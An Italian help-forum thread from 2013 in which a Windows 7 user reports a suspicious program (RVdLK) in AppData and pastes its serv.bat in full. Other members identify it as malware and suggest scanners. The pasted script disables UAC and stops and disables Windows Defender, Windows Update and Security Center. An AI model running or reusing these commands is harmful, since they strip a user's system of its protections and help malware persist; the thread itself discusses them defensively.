Virus o troiano non rilevato: ditemi se non lo è questo

[chairam]

Buongiorno
appena successo che windows 7 mi chiede il permesso di eseguire un programma di nome RVdLK
allora indago: scopro che mi trovo questa cartella:
C:\Users\Rob\AppData\Roaming\RVdLK_virus
con data di oggi, io non ricordo di aver installato sta roba e non so cosa sia
il contenuto è:
***********************************
Directory of C:\Users\Rob\AppData\Roaming\RVdLK

08/06/2013 19:00 <DIR> .
08/06/2013 19:00 <DIR> ..
08/06/2013 18:08 0 D1
08/06/2013 18:03 668.160 RVdLK.exe
08/06/2013 18:03 5.430 RVdLK.ico
08/06/2013 18:03 222 RVdLK.ini
08/06/2013 18:03 232 RVdLK.log
08/06/2013 18:08 824 serv.bat
7 File(s) 674.868 bytes
2 Dir(s) 14.864.527.360 bytes free
***********************************
che non si capisce bene cosa sia
riporto serv.bat
che a quanto capisco disattiva sistemi di sicurezza di windows, firewall, antitroiano etc..
***********************************
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableVirtualization /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v RPSessionInterval /t REG_DWORD /d 0 /f
sc stop windefend
sc stop msmpsvc
sc stop wuauserv
sc stop wscsvc
ping localhost -w 1000 -n 3 > nul
sc config windefend start= disabled
sc config msmpsvc start= disabled
sc config wuauserv start= disabled
sc config wscsvc start= disabled
sc config luafv start= disabled
ping localhost -w 1000 -n 2 > nul
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MSASCui /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Defender" /f
***********************************
nel registro di configurazione ha inserito una chiave in
...\windows\CurrentVersion\Run a nome SD214 che lancia RVdLK.exe

il mio antivirus Avira Free non lo classifica come virus
spybot non ha trovato da lamentarsi

non mi sono fidato, ho negato l'autorizzazione all'esecuzione
ho 'sputtanato' la chiave di registro e la cartella appena apparsa
per me sto coso non è niente di buono

sarei felice di sentire qualche opinione
Grazie

[nV 25]

malware al 100%

[nV 25]

disabilita l'UAC (reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableLUA /t REG_DWORD /d 0 /f) perchè evidentemente richiede privilegi maggiori di quelli standard, ecc.

Malware 100% indipendentemente dal responso di Avira..

[chairam]

C'è modo di sapere come ha fatto arrivare sul mio hd, come è stato lanciato, installato... qualche indizio insomma, non vorrei trovarmelo reinstallato con un altro nome

[nV 25]

giro rapido di hitmanpro/malwarebytes per scrupolo.

Sul sapere da dove è entrato, ci vorrebbe la sfera di cristallo.

Solitamente è il browser:
hai Java?

OS?
UAC (ovviamente) attivo (giusto?) e a su che livello?

[chairam]

ho java e adesso faccio l'aggiornamento
UAC poi controllo e ti faccio sapere
intanto mote grazie

[chairam]

os win7 ultimate 64bit
hitman pro mi trova tanti tracking cookie cosa che non mi preoccupa più di tanto
e un paio di malaware

uno dei due è heurlik
simpaticamente avira lanciato sull'eseguibuile non si lamenta neanche (ma che caxxo)

hitman dice anche che ho un proxy in locale questa si cosa brutta ma, pare che sia un falso allarme perchè cercando la sua porta 21320 con netstat -b -a scopro che è sdfssvc.exe che è un eseguibile nella cartella di spybot search&destroy
ma che cavolo fanno queli di spybot search&destroy mi installano un cavolo di proxy che non mi fa più partire alcune applicazioni java e manco me lo dicono accidenti a loro? boh
vale la pena tenerlo sto spybot? da un po' non lo tenevo più perché mi appesantiva troppo la macchina

per il resto pare che il grosso della minaccia sia stato sventato
tnx